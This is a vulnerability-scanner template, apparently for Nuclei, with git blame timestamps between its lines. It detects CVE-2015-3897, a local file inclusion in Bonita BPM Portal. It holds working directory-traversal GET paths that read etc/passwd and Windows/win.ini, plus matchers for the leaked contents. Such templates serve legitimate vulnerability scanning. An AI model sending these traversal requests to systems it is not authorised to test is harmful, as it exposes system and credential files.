2022-04-08 08:41:27 +00:00
id : CVE-2015-3897
2022-04-22 10:38:41 +00:00
2022-04-08 08:41:27 +00:00
info :
2022-06-09 20:35:21 +00:00
name : Bonita BPM Portal <6.5.3 - Local File Inclusion
2022-04-08 08:41:27 +00:00
author : 0x_Akoko
severity : high
2022-06-09 20:35:21 +00:00
description : Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
2022-04-08 08:41:27 +00:00
reference :
- https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html
2022-04-09 19:01:56 +00:00
- https://www.bonitasoft.com/
2022-04-08 08:41:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-3897
2022-05-17 09:18:12 +00:00
- https://www.htbridge.com/advisory/HTB23259
2022-04-08 08:41:27 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2015-3897
cwe-id : CWE-22
2022-04-09 19:01:56 +00:00
tags : cve,cve2015,bonita,lfi,unauth
2022-04-08 08:41:27 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd"
2022-04-09 19:01:56 +00:00
- "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"
2022-04-08 08:41:27 +00:00
2022-04-09 19:01:56 +00:00
stop-at-first-match : true
matchers-condition : or
2022-04-08 08:41:27 +00:00
matchers :
2022-04-09 19:01:56 +00:00
- type : word
part : body
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
2022-04-08 08:41:27 +00:00
- type : regex
regex :
2022-04-09 19:01:56 +00:00
- "root:[x*]:0:0:"
2022-06-09 20:35:21 +00:00
# Enhanced by mp on 2022/06/08